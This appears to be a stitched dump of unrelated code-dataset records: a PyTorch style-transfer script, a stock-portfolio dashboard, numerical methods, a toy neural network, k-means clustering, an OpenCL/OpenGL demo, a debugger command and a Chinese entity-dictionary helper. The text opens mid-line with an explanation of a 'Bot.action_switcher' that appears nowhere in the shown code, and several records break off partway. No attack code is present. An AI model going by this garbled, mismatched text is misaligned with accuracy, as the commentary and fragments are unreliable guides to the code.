torchvision.models as 
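`Bot.action_switcher` above dispatches on a dict literal, `{'text': ..., 'image': ...}.get(type)(data)`. Note that `.get` without a default returns `None` for an unknown key, so that version would raise `TypeError` on an unexpected type. A standalone sketch of the same dispatch-table pattern with a fallback handler supplied as the default:

```python
def output_message(data):
    print("message:", data)

def output_image(data):
    print("image:", data)

def fallback(data):
    print("unsupported type:", data)

def action_switcher(kind, data):
    # .get with a default avoids calling None for unknown kinds.
    handler = {"text": output_message, "image": output_image}.get(kind, fallback)
    handler(data)

action_switcher("text", "hello")   # message: hello
action_switcher("gif", "cat.gif")  # unsupported type: cat.gif
```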
models\n\nimport copy\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu') # use cuda if it is available\nimsize = 512 if torch.cuda.is_available() else 128 # choose image size based on cuda availability\n\nprint(f\"device ------------ {device}\")\n\ncnn = models.vgg19(pretrained=True).features.to(device).eval()\ncnn_normalization_mean = torch.tensor([0.485, 0.456, 0.406]).to(device)\ncnn_normalization_std = torch.tensor([0.229, 0.224, 0.225]).to(device)\n\nclass ContentLoss(nn.Module):\n '''content loss class'''\n def __init__(self, target,):\n super(ContentLoss, self).__init__()\n self.target = target.detach()\n\n def forward(self, input):\n self.loss = F.mse_loss(input, self.target)\n return input\n\ndef gram_matrix(input):\n # computes gram matrix\n a, b, c, d = input.size()\n features = input.view(a * b, c * d)\n\n G = torch.mm(features, features.t())\n return G.div(a * b * c * d)\n\nclass StyleLoss(nn.Module):\n '''style loss class'''\n def __init__(self, target_feature):\n super(StyleLoss, self).__init__()\n self.target = gram_matrix(target_feature).detach()\n\n def forward(self, input):\n G = gram_matrix(input)\n self.loss = F.mse_loss(G, self.target)\n return input\n\nclass NormalizationLayer(nn.Module):\n '''normalization class'''\n\n def __init__(self, mean, std):\n super(NormalizationLayer, self).__init__()\n self.mean = torch.tensor(mean).view(-1, 1, 1)\n self.std = torch.tensor(std).view(-1, 1, 1)\n\n def forward(self, img):\n return (img - self.mean) / self.std\n\ndef load_image(img, maxsize=None, shape=None):\n # load image with maxsize or fixed size\n image = Image.open(BytesIO(img))\n image = image.convert('RGB')\n if maxsize:\n loader = transforms.Compose([\n transforms.Resize(maxsize),\n transforms.ToTensor()])\n elif shape:\n loader = transforms.Compose([\n transforms.Resize(shape),\n transforms.ToTensor()])\n image = loader(image).unsqueeze(0)\n return image.to(device, torch.float)\n\ndef get_style_model_and_losses(cnn, mean, std, style_img, content_img):\n '''Get model, style and content losses'''\n content_layers = ['conv_4']\n style_layers = ['conv_1', 'conv_2', 'conv_3', 'conv_4', 'conv_5']\n\n cnn = copy.deepcopy(cnn)\n\n normalization = NormalizationLayer(mean, std).to(device)\n\n content_losses = []\n style_losses = []\n\n model = nn.Sequential(normalization)\n\n conv_ind = 0\n for name, layer in cnn._modules.items():\n if isinstance(layer, nn.Conv2d):\n conv_ind += 1\n name = f'conv_{conv_ind}'\n elif isinstance(layer, nn.ReLU):\n layer = nn.ReLU(inplace=False)\n\n model.add_module(name, layer)\n\n if name in content_layers:\n target = model(content_img).detach()\n content_loss = ContentLoss(target)\n model.add_module(f\"content_loss_{conv_ind}\", content_loss)\n content_losses.append(content_loss)\n\n if name in style_layers:\n target_feature = model(style_img).detach()\n style_loss = StyleLoss(target_feature)\n model.add_module(f\"style_loss_{conv_ind}\", style_loss)\n style_losses.append(style_loss)\n \n model = model[:18]\n\n return model, style_losses, content_losses\n\ndef run_style_transfer(cnn, mean, std,content_img, style_img, input_img):\n print('Training...')\n style_weight = 1000000\n content_weight = 1\n num_steps = 300\n model, style_losses, content_losses = get_style_model_and_losses(cnn, mean, std, style_img, content_img)\n optimizer = optim.LBFGS([input_img.requires_grad_()])\n iter = 0\n while iter <= num_steps:\n def closure():\n nonlocal iter\n input_img.data.clamp_(0, 1)\n\n optimizer.zero_grad()\n model(input_img)\n 
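`gram_matrix` above flattens a `(batch, channels, h, w)` feature map into `(batch*channels, h*w)` rows, multiplies by the transpose, and normalizes by the total element count. A quick shape-and-symmetry check on a dummy tensor (the sizes are arbitrary):

```python
import torch

def gram_matrix(x):
    a, b, c, d = x.size()            # batch, channels, height, width
    features = x.view(a * b, c * d)  # one row per (batch, channel) map
    G = torch.mm(features, features.t())
    return G.div(a * b * c * d)

feat = torch.randn(1, 3, 4, 4)       # dummy feature map
G = gram_matrix(feat)
print(G.shape)                       # torch.Size([3, 3])
print(torch.allclose(G, G.t()))      # True: Gram matrices are symmetric
```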
style_score = 0\n content_score = 0\n\n for sl in style_losses:\n style_score += sl.loss\n for cl in content_losses:\n content_score += cl.loss\n\n style_score *= style_weight\n content_score *= content_weight\n\n loss = style_score + content_score\n loss.backward()\n\n iter += 1\n if iter % 50 == 0:\n print(f\"Iter {iter}:\")\n print('Style Loss : {:4f} Content Loss: {:4f}'.format(style_score.item(), content_score.item()))\n print()\n\n\n return style_score + content_score\n\n optimizer.step(closure)\n \n input_img.data.clamp_(0, 1)\n\n return input_img\n\ndef NST(style_img, content_img):\n content_img = load_image(content_img, maxsize=imsize)\n style_img = load_image(style_img,shape=(content_img.size(2), content_img.size(3)))\n \n # load style and content images\n print(style_img.size(), content_img.size())\n assert style_img.size() == content_img.size(), \"we need to import style and content images of the same size\"\n input_img = content_img.clone()\n image = run_style_transfer(cnn, cnn_normalization_mean, cnn_normalization_std, content_img, style_img, input_img)\n\n\n unloader = transforms.ToPILImage() # convert into PIL image\n image = image.cpu().clone()\n image = image.squeeze(0) # remove extra dimension\n image = unloader(image)\n\n # decode image to base64 string\n buffered = BytesIO()\n image.save(buffered, format=\"JPEG\")\n img_str = base64.b64encode(buffered.getvalue())\n \n # create result json\n result = {}\n result[\"image\"] = 'data:image/jpeg;base64,' + img_str.decode('utf-8')\n return result","sub_path":"nst.py","file_name":"nst.py","file_ext":"py","file_size_in_byte":5895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"450399886","text":"import pandas as pd\r\nimport datetime as dt\r\nimport yfinance as yf\r\nimport streamlit as st\r\n\r\nclass DashTools():\r\n \r\n def __init__(self):\r\n \r\n #we have to make dataframe by hand becuase everything will run from github so no directory \r\n self.weights = pd.read_excel(\"holdings.xlsx\", index_col = 0)\r\n \r\n #get tickers\r\n self.tickers = sorted(list(self.weights.index))\r\n \r\n #turns this into a pd.series with tickers as index and number of shares as value\r\n self.share_count = self.weights['share_count']\r\n \r\n #grab todays date\r\n self.end_date = dt.datetime.today()\r\n \r\n #the cost basis day provided from LITG\r\n self.start_date = dt.datetime(2019,2,19)\r\n \r\n #get update time\r\n self.update_date = self.end_date.strftime(\"%a %D %I:%M %p\") \r\n \r\n #get daily_prices\r\n self.daily_prices = yf.download(self.tickers, self.start_date, self.end_date)['Close'].dropna()\r\n \r\n #this will make a dataframe with all of the columns being the value of the stock and the last columnn will be the value of the fund\r\n #becasue it takes a lot of work to make this dataframe create a function for defining the variable\r\n self.daily_portfolio = self.make_daily_portfolio()\r\n \r\n #this function will make the portfolio\r\n def make_daily_portfolio(self):\r\n \r\n #iniitalize a dataframe \r\n daily_portfolio = pd.DataFrame(columns = self.tickers, index = self.daily_prices.index)\r\n \r\n #the goal here is to multiply all of the cells which are prices by the number of shares\r\n \r\n #we are going to go through each column at a time\r\n for i in self.tickers:\r\n \r\n #grab the number of shares\r\n share_count = self.share_count[i]\r\n \r\n #now go through the price of the stock for each day\r\n for j in range(len(self.daily_prices[i])):\r\n \r\n #get the 
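`run_style_transfer` above drives `optim.LBFGS` through a closure: LBFGS may re-evaluate the objective several times per `step()`, so it needs a callable that redoes the full zero-grad/forward/backward cycle and returns the loss. The same pattern on a toy scalar objective:

```python
import torch
import torch.optim as optim

x = torch.tensor([0.0], requires_grad=True)
optimizer = optim.LBFGS([x])

def closure():
    # LBFGS calls this several times per step(), so the whole
    # zero-grad / loss / backward cycle is repeated each call.
    optimizer.zero_grad()
    loss = ((x - 3.0) ** 2).sum()   # toy objective, minimum at x = 3
    loss.backward()
    return loss

for _ in range(5):
    optimizer.step(closure)

print(x.item())  # ~3.0
```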
price of the stock\r\n price = self.daily_prices[i][j]\r\n \r\n #multiply the price of the stock by the number of shares and put that into the daily_portfolio\r\n daily_portfolio[i][j] = round(price * share_count,2)\r\n \r\n #this will sum of the value of each stock to get a final portfolio value\r\n daily_portfolio[\"value\"] = daily_portfolio.sum(axis = 1)\r\n \r\n #now output that back out \r\n return daily_portfolio\r\n \r\n def make_monthly_portfolio(self):\r\n \r\n #get monthly prices\r\n monthly_prices = yf.download(self.tickers, self.start_date, self.end_date, interval = \"1mo\")['Close'].dropna()\r\n \r\n #we want to make a monthly_portfolio that is empty but with the same index and column as our monthly prices\r\n monthly_portfolio = pd.DataFrame(columns = self.tickers, index = monthly_prices.index)\r\n \r\n #we want to through each stock\r\n for i in self.tickers:\r\n \r\n #we want to get our allocation size\r\n share_count = self.share_count[i]\r\n \r\n #we want to loop through the prices of the stock\r\n for j in monthly_prices.index:\r\n \r\n #get the price\r\n price = monthly_prices[i][j]\r\n \r\n #multiply prices by number of shares\r\n monthly_portfolio[i][j] = share_count * price\r\n \r\n return monthly_portfolio\r\n \r\n \r\n \r\n ","sub_path":"dash_beta/dash_tools.py","file_name":"dash_tools.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"269222729","text":"#Cristian Camilo Benitez\nfrom math import*\n\n# Defining Function\ndef f(x): \n return sin(x)+1 \n\n# Implementing Secant Method\n\ndef secant(x0,x1,e,N):\n print('\\n\\n*** Metodo de la secante ***')\n step = 1\n condition = True\n while condition:\n if f(x0) == f(x1):\n print('Divide by zero error!')\n break\n \n x2 = x0 - (x1-x0)*f(x0)/( f(x1) - f(x0) ) \n print('Iteracion-%d, x2 = %0.6f y f(x2) = %0.6f' % (step, x2, f(x2)))\n x0 = x1\n x1 = x2\n step = step + 1\n \n if step > N:\n print('No Convergente!')\n break\n \n condition = abs(f(x2)) > e\n print('\\n Raiz aprox.: %0.8f' % x2)\n\n\nx0 = input('Primer valor: ')\nx1 = input('Segundo valor: ')\nN = input('Max iteraciones: ')\n\nx0 = float(x0)\nx1 = float(x1)\ne = 10**-16\n\nN = int(N)\n\n\n# Starting Secant Method\nsecant(x0,x1,e,N)","sub_path":"Parciales/Corte 1/punto 1-CristianBenitez.py","file_name":"punto 1-CristianBenitez.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"531811286","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 1 10:37:26 2020\n\n@author: yinz\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nclass training():\n def __init__(self,inputs,labels,midlayer_size,output_size,learning_rate,iteration,):\n #np.random.seed(0)\n\n self.inputs = inputs \n self.labels = labels \n self.weight_hide = np.random.randn(inputs.shape[1], midlayer_size) \n self.weight_out = np.random.randn(midlayer_size,output_size)\n\n self.learning_rate = learning_rate\n self.threshold_hide = np.random.rand(midlayer_size)\n self.threshold_out = np.random.rand(output_size)\n min_val = -2.4/inputs.shape[1]\n max_val = 2.4/inputs.shape[1]\n \n self.threshold_hide = min_val + (self.threshold_hide *(max_val - min_val))\n self.threshold_out = min_val + (self.threshold_out *(max_val - min_val))\n\n self.iteration = iteration\n\n def sigmod(self,x):\n return 1/(1+np.exp(-x))\n \n def sigmoid_prime(self,x):\n return (x)*(1.0-x)\n\n def 
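The secant routine above iterates `x2 = x0 - (x1 - x0) * f(x0) / (f(x1) - f(x0))` until `|f(x2)|` drops below the tolerance. A compact worked example of the identical update finding sqrt(2) as the root of x^2 - 2 (the function and starting points are my own choices):

```python
def f(x):
    return x * x - 2.0   # root at sqrt(2)

x0, x1 = 1.0, 2.0
for step in range(1, 10):
    if f(x0) == f(x1):
        break                      # same divide-by-zero guard as above
    x2 = x0 - (x1 - x0) * f(x0) / (f(x1) - f(x0))
    print(step, x2)
    x0, x1 = x1, x2
    if abs(f(x2)) < 1e-12:
        break
# converges to 1.41421356... within a handful of iterations
```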
feedforward(self):\n\n self.midlayer = self.sigmod(np.dot(self.inputs,self.weight_hide) - self.threshold_hide)\n # print (\"midlayer\",self.midlayer.shape)\n self.outputlayer = self.sigmod(np.dot(self.midlayer,self.weight_out )- self.threshold_out) \n # print (\"outputlayer\",self.outputlayer.shape)\n \n \n def weight(self):\n \n error_out = (self.labels - self.outputlayer) * self.sigmoid_prime(self.outputlayer) \n # print (\"error_out\",error_out.shape)\n \n gradient_descent_output = np.dot(self.midlayer.T,error_out) \n # print (\"gradient_descent_output\",gradient_descent_output.shape)\n delta_weight_out = np.dot(self.learning_rate,gradient_descent_output) \n # print (\"delta_weight_out\",delta_weight_out.shape)\n #delta_threashold_out = np.dot(self.learning_rate,np.dot(self.threshold_out.T,error_out)) \n # print (\"delta_threashold_out\",delta_threashold_out.shape)\n \n error_hide = np.dot(error_out,self.weight_out.T) * (self.sigmoid_prime(self.midlayer))\n # error_hide = np.dot(self.sigmoid_prime(self.midlayer),np.dot(self.weight_out,error_out)) \n # print (\"error_hide\",error_hide.shape)\n gradient_descent_hide = np.dot(self.inputs.T,error_hide) \n \n # print (\"gradient_descent_hide\",gradient_descent_hide.shape)\n delta_weight_hide = np.dot(self.learning_rate,gradient_descent_hide)\n # print (\"delta_weight_hide\",delta_weight_hide.shape)\n \n #delta_threashold_hide = np.dot(self.learning_rate,np.dot(self.threshold_hide,error_hide))\n\n self.weight_out = self.weight_out + delta_weight_out\n #self.threshold_out = self.threshold_out + delta_threashold_out\n \n \n self.weight_hide = self.weight_hide + delta_weight_hide\n #self.threshold_hide=self.threshold_hide + delta_threashold_hide\n \n def evaulation(self):\n accuracy = np.argmax(self.outputlayer,1) == np.argmax(self.labels,1)\n accuracy = str(int(np.count_nonzero(accuracy)/10*100))+\"%\"\n return (np.sum(np.power((self.labels - self.outputlayer),2))),accuracy\n \n \n def test_result(self,testData):\n\n midlayer = self.sigmod(np.dot(testData,self.weight_hide) - self.threshold_hide)\n # print (\"midlayer\",self.midlayer.shape)\n result = self.sigmod(np.dot(midlayer,self.weight_out )- self.threshold_out) \n return (result)\n # print (\"outputlayer\",self.outputlayer.shape)\n \n def main(self,testData=''):\n results = []\n for i in range (self.iteration):\n self.feedforward()\n self.weight()\n result = self.evaulation()\n #if result[1] == \"100%\":\n # break\n results.append(result)\n\n \n sum_square_error,accuracy = zip(*results)\n\n plt.plot(sum_square_error)\n plt.xlabel(\"Epochs\")\n plt.ylabel(\"Sum Square Error\")\n plt.show()\n \n testint_result = self.test_result(testData)\n print (np.argmax(testint_result))\n \nclass data_set():\n \n \n def data(self):\n d1=[3,7,8,11,13,18,23,28,33,38,43]\n d2=[2,3,4,6,10,15,20,24,28,32,36,41,42,43,44,45]\n d3=[2,3,4,6,10,15,20,24,30,35,36,40,42,43,44]\n d4=[4,8,9,13,14,18,19,22,24,26,29,31,32,33,34,35,39,44]\n d5=[1,2,3,4,5,6,11,16,17,18,19,21,25,30,35,36,40,42,43,44]\n d6=[2,3,4,6,10,11,16,21,22,23,24,26,30,31,35,36,40,42,43,44]\n d7=[1,2,3,4,5,10,14,19,23,28,33,38,43]\n d8=[2,3,4,6,10,11,15,16,20,22,23,24,26,30,31,36,36,40,42,43,44]\n d9=[2,3,4,6,10,11,15,16,20,22,23,24,25,30,35,36,40,42,43,44]\n d0=[2,3,4,6,10,11,16,21,26,31,36,42,43,44,15,20,25,30,35,40]\n \n data_list=[d0,d1,d2,d3,d4,d5,d6,d7,d8,d9]\n d_shape = np.zeros(45)\n data_set=[]\n for j in data_list:\n \n d_shape = np.zeros(45)\n \n for i in j:\n \n d_shape[i-1] = 1\n # d_shape = d_shape.reshape((-1,1))\n 
data_set.append(d_shape)\n data_set = np.asanyarray(data_set) \n #data_set = data_set.T\n label_set = np.zeros([10,10])\n \n \n for i in range(10):\n label_set[i][i]=1\n # label = np.zeros(10)\n # label[i]=1\n # label = label.reshape(-1,1)\n # label_set.append(label)\n \n #label_set = np.asanyarray(label_set)\n return data_set,label_set\n \n\n\n\nget_data = data_set()\ntraining_data,label_data = get_data.data()\n\ninput_value = [3,7,8,11,13,18,23,28,33,38,43]\ninput_test = np.zeros(45)\nfor i in input_value:\n input_test[i-1] = 1\n\noutput_test = [0,1,0,0,0,0,0,0,0,0]\n#input_test = input_test.reshape(-1,1)\noutput_test = np.asanyarray(output_test)#.reshape(-1,1)\ntrainings = training(training_data,label_data,5,10,0.5,10000)\ntrainings.main(input_test)","sub_path":"p3.py","file_name":"p3.py","file_ext":"py","file_size_in_byte":6006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"383855114","text":"import random\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom math import *\nfrom decimal import Decimal\n\ndef euclidean_distance(x1, x2):\n return np.sqrt(np.sum((x1 - x2) ** 2))\n\ndef minkowski_distance(x1, x2, r): \n return sum([abs(x-y)**r for x,y in zip(x1,x2)])**1/r\n\ndef pearson_correlation(x1, x2):\n mean_x = sum(x1)/len(x1)\n mean_y = sum(x2)/len(x2)\n subtracted_mean_x = [i - mean_x for i in x1]\n subtracted_mean_y = [i - mean_y for i in x2]\n x_times_y = [a * b for a, b in list(zip(subtracted_mean_x, subtracted_mean_y))]\n x_squared = [i * i for i in x1]\n y_squared = [i * i for i in x2]\n return sum(x_times_y) / sqrt(sum(x_squared) * sum(y_squared))\n\ndef plot_points(data_points):\n x, y = data_points.T\n plt.scatter(x, y)\n plt.show\n\ndef create_centers(k):\n centers = []\n for i in range(k):\n centers.append([random.randint(0, 100), random.randint(0, 100)])\n return np.array(centers)\n\ndef compute_new_centers(cluster, centers):\n return np.array(cluster + centers)/2\n\ndef assign_cluster(distance, data_point, centers):\n index_min = min(distance, key = distance.get)\n return [index_min, data_point, centers[index_min]]\n\ndef k_means(data_points, centers, p_measure):\n label = []\n cluster = []\n total_points = len(data_points)\n k = len(centers)\n if(p_measure == 'm'):\n r = int(input(\"Enter value of r: \"))\n for epoch in range(0, 200):\n for index_point in range(0, total_points):\n distance = {}\n for center_index in range(0, k):\n if(p_measure == 'e'):\n distance[center_index] = euclidean_distance(\n data_points[index_point], centers[center_index])\n elif(p_measure == 'm'):\n distance[center_index] = minkowski_distance(\n data_points[index_point], centers[center_index], r)\n elif(p_measure == 'p'):\n distance[center_index] = pearson_correlation(\n data_points[index_point], centers[center_index])\n elif(p_measure == 's'):\n distance[center_index] = spearman_correlation(\n data_points[index_point], centers[center_index])\n label = assign_cluster(distance, data_points[index_point], centers)\n centers[label[0]] = compute_new_centers(\n label[1], centers[label[0]])\n if epoch == (200 - 1):\n cluster.append(label)\n return [cluster, centers]\n\ndef print_cluster_data(result):\n print(\"Result of k-Means Clustering: \\n\")\n for data in result[0]:\n print(\"data point: {}\".format(data[1]))\n print(\"cluster number: {} \\n\".format(data[0]))\n print(\"Last centroids position: \\n {}\".format(result[1]))\n\n\ndef rearrange_clusters(k, result):\n clusters = []\n for cluster in range(k):\n cluster_points = []\n for 
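A detail worth making explicit in the network above: `sigmoid_prime` expects the *already activated* value, computing sigma'(z) as s*(1-s) with s = sigma(z), which is why it is applied to `self.outputlayer` and `self.midlayer` rather than to pre-activations. A numerical check of that identity against a central difference:

```python
import numpy as np

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

z = np.linspace(-4, 4, 9)
s = sigmoid(z)

analytic = s * (1.0 - s)                          # the s*(1-s) form used above
h = 1e-6
numeric = (sigmoid(z + h) - sigmoid(z - h)) / (2 * h)

print(np.max(np.abs(analytic - numeric)))         # ~1e-10: the forms agree
```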
data in result[0]:\n if data[0] == cluster :\n cluster_points.append(np.array(data[1]))\n clusters.append(np.array(cluster_points))\n return clusters\n\n\n\nif __name__ == \"__main__\":\n data_points = np.genfromtxt(\"assets/data.csv\", delimiter=\",\")\n #plot_points(data_points)\n p_choice = 0\n print(\"PROXIMITY MEASURES:\\n\\n1. Euclidean Distance\\n2. Minkowski Distance\\n3. Pearson Correlation \\n4. Spearman Correlation\")\n while p_choice not in [1, 2, 3]:\n p_choice = int(input(\"Choose proximity measure to be used: \"))\n if(p_choice == 1):\n p_measure = 'e'\n elif(p_choice == 2):\n p_measure = 'm'\n elif(p_choice == 3):\n p_measure = 'p'\n elif(p_choice == 4):\n p_measure = 's'\n k = int(input(\"No. of clusters: \"))\n centers = create_centers(k)\n [cluster, new_centers] = k_means(data_points, centers, p_measure)\n clusters = rearrange_clusters(k, [cluster, new_centers])\n #print(clusters)\n for cluster in clusters:\n plot_points(cluster)","sub_path":"k-means.py","file_name":"k-means.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"557707616","text":"def get_3_lagest(l):\n\t\"\"\"Find 3 the largest items from a list\"\"\"\n\t# Only change code below this line\n\tif len(l)<3: return l\n\telse:\n\t l.sort() #(reverse=True)\n\t lm = l[-3:len(l)]\n\treturn lm\n\t# Only change code above this line\n\n\nok = True\n \ndef test(x, y, msg):\n\tif x != y:\n\t\tprint(\"Test failed:\", msg)\n\t\tprint(\"Actual result: \", x)\n\t\tprint(\"Expected result: \", y)\n\t\tprint(\"\")\n\t\tglobal ok\n\t\tok = False\n \ntest(get_3_lagest([]), [], \"Empty list\")\ntest(get_3_lagest([1, 2]), [1, 2], \"Only 2 items\")\ntest(get_3_lagest([3, 2, 1, 5, -1, 7, 3, 8]), [5, 7, 8], \"More than 3 items\")\n\nif ok:\n\tprint(\"All tests passed\")\n","sub_path":"testMA_04.py","file_name":"testMA_04.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"329362853","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# -----------------------------------------------------------------------------\n# Copyright (c) 2014, Vispy Development Team.\n# Author: Jérôme KIEFFER\n# Distributed under the (new) BSD License. See LICENSE.txt for more info.\n# -----------------------------------------------------------------------------\n\n\"\"\"\nDemo showing the sharing of a OpenGL texture <--> OpenCL image\n\"\"\"\n\nimport os\nimport sys\nimport time\nimport numpy\nfrom vispy import app\nfrom vispy import gloo\nfrom vispy import opencl\nimport pyopencl.array\nN = 2048\n\n\nsrc = \"\"\"\n__kernel void buf_to_tex( global const float *ary,\n int width,\n int height,\n global const float *mini,\n global const float *maxi,\n const int logscale,\n write_only image2d_t texture)\n{\n int x = get_global_id(0);\n int y = get_global_id(1);\n if ((x>=width)||(y>=height)) return;\n float data;\n if (maxi[0]==mini[0])\n data = (ary[x+width*y] - mini[0]);\n else\n data = (ary[x+width*y] - mini[0])/(maxi[0]-mini[0]);\n if (logscale)\n data = log(data*(M_E_F-1.0f)+1.0f);\n write_imagef( texture, (int2)(x,y), data);\n}\n__kernel void\nu16_to_float(global unsigned short *array_int,\n global float *array_float,\n const int IMAGE_W,\n const int IMAGE_H\n )\n{\n //Global memory guard for padding\n if ((get_global_id(0) : => \n while : => \n return => \n = => \n\nThe above is done via regular expression matching. 
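One caveat in the distance helpers above: in `minkowski_distance`, `sum(...)**1/r` parses as `(sum(...)**1)/r` because `**` binds tighter than `/`, so the r-th root is never taken. With the exponent parenthesized, r = 2 reproduces the Euclidean distance, which gives a quick sanity check:

```python
import numpy as np

def euclidean_distance(x1, x2):
    return np.sqrt(np.sum((np.asarray(x1) - np.asarray(x2)) ** 2))

def minkowski_distance(x1, x2, r):
    # (1.0 / r) must be parenthesized; **1/r would divide by r instead.
    return sum(abs(a - b) ** r for a, b in zip(x1, x2)) ** (1.0 / r)

p, q = [0.0, 0.0], [3.0, 4.0]
print(euclidean_distance(p, q))      # 5.0
print(minkowski_distance(p, q, 2))   # 5.0 with the fix; 12.5 without it
```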
No fancy parsing is\ndone, say, to look to see if *expr* is split across a line or whether\nvar an assignment might have multiple variables on the left-hand side.\n\n**Examples:**\n\n eval 1+2 # 3\n eval # Run current source-code line\n eval? # but strips off leading 'if', 'while', ..\n # from command\n\nSee also `set autoeval`, `pr`, `pp` and `examine`.\n\"\"\"\n __module__ = __name__\n aliases = ('eval?', '?')\n category = 'data'\n min_args = 0\n max_args = None\n name = os.path.basename(__file__).split('.')[0]\n need_stack = True\n short_help = 'Print value of expression EXP'\n\n def run(self, args):\n if 1 == len(args):\n text = self.proc.current_source_text.rstrip('\\n')\n if '?' == args[0][(-1)]:\n text = Meval.extract_expression(text)\n self.msg('eval: %s' % text)\n else:\n text = self.proc.current_command[len(self.proc.cmd_name):]\n text = text.strip()\n try:\n self.proc.exec_line(text)\n except:\n pass\n\n\nif __name__ == '__main__':\n import inspect\n cmdproc = import_relative('cmdproc', '..')\n debugger = import_relative('debugger', '...')\n d = debugger.Debugger()\n cp = d.core.processor\n cp.curframe = inspect.currentframe()\n command = EvalCommand(cp)\n me = 10","sub_path":"pycfiles/pydbgr-0.2.6-py2.4/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"534231196","text":"import tkitText\nimport tkitDb\nimport os\nimport gc\n# tt=tkitText.Text()\n# tt=tkitText.Text()\n# tt.load_ht(ht_model=\"tkitfiles/ht.model\")\n\n# tt.load_ht()\n# tt.typed_words(ht_model=\"tkitfiles/ht_rel.model\")\n# para=\"\"\"\n# 根据统计,边境牧羊犬的寿1命大概在13-14年左右,它的体型中等,身躯筋肉健壮\n# \"\"\"\n\n# print(tt.ht.cut_sentences(para))\n\n\n# for word, flag in tt.ht.posseg(para):\n# \tprint(\"%s:%s\" % (word, flag),end = \" \")\n# # tt.ht.add_new_entity(\"寿命\", mention0=\"寿1命\", type0=\"关系词\") # 作为特定类型登录\n\n\n# for word, flag in tt.ht.posseg(para):\n# \tprint(\"%s:%s\" % (word, flag),end = \" \")\n\n\n\n# para = \"上港的武磊和恒大的郜林,谁是中国最好的前锋?那当然是武磊武球王了,他是射手榜第一,原来是弱点的单刀也有了进步\"\n\n# entity_mention_dict = {'武磊':['武磊','武球王'],'郜林':['郜林','郜飞机'],'前锋':['前锋'],'上海上港':['上港'],'广州恒大':['恒大'],'单刀球':['单刀'],'寿命':[\"寿命\",'寿1命']}\n# entity_type_dict = {'武磊':'球员','郜林':'球员','前锋':'位置','上海上港':'球队','广州恒大':'球队','单刀球':'术语','寿命':'关系词'}\n# entity_dict=entity_mention_dict,entity_type_dict\n# pkl=tkitDb.Pkl(path=\"tkitfiles\",task='entity_dict')\n# pkl.save([entity_dict])\n\n# def load_entity_dict():\n# \"\"\"\n# 加载词典\n# \"\"\"\n# pkl=tkitDb.Pkl(path=\"tkitfiles\",task='entity_dict')\n# entity_dict_list = []\n# for item in pkl.load():\n# entity_dict_list=entity_dict_list+item\n# return entity_dict_list[0]\n\n\n\n\n\n# #保存术语词\n# tt.ht.save_entity_info(save_path='./ht_entities.txt',)\n# # 加载术语\n# tt.ht.load_entities( load_path='./ht_entities.txt', override=True)\n# #添加术语\n# entity_mention_dict = {'武磊':['武磊','武球王'],'郜林':['郜林','郜飞机'],'前锋':['前锋'],'上海上港':['上港'],'广州恒大':['恒大'],'单刀球':['单刀'],'寿命':[\"寿命\",'寿1命']}\n# entity_type_dict = {'武磊':'球员','郜林':'球员','前锋':'位置','上海上港':'球队','广州恒大':'球队','单刀球':'术语','寿命':'关系词'}\n# tt.ht.add_entities(entity_mention_dict,entity_type_dict)\n\n\n\n\n\n# print(tt.ht.entity_type_dict)\n# print(tt.ht.entity_mention_dict)\n# print(tt.ht.entity_type_dict)\n\n\n\nclass TEntityRel:\n \"\"\"\n 关系词和实体操作类\n \"\"\"\n\n def __init__(self,model=None):\n self.tt=tkitText.Text()\n if model ==None:\n self.model=\"tkitfiles/ht.model\"\n else:\n self.model=model\n if os.path.exists(self.model):\n self.tt.load_ht(ht_model=self.model)\n 
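The `eval?` docstring above describes purely textual rewrites (`if expr:` becomes `expr`, `while expr:` becomes `expr`, `return expr` becomes `expr`, `var = expr` becomes `expr`). A hedged sketch of how such stripping could look with `re`; this is my reconstruction from the docstring, not the actual `Meval.extract_expression`:

```python
import re

def extract_expression(text):
    text = text.strip()
    # if expr: / while expr:  ->  expr
    m = re.match(r"(?:if|while)\s+(.+?):\s*$", text)
    if m:
        return m.group(1)
    # return expr  ->  expr
    m = re.match(r"return\s+(.+)$", text)
    if m:
        return m.group(1)
    # var = expr  ->  expr  ((?!=) avoids matching ==; no attempt at
    # multi-target assignments, matching the "no fancy parsing" caveat)
    m = re.match(r"[A-Za-z_]\w*\s*=(?!=)\s*(.+)$", text)
    if m:
        return m.group(1)
    return text

print(extract_expression("if x > 0:"))   # x > 0
print(extract_expression("return a+b"))  # a+b
print(extract_expression("y = f(3)"))    # f(3)
```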
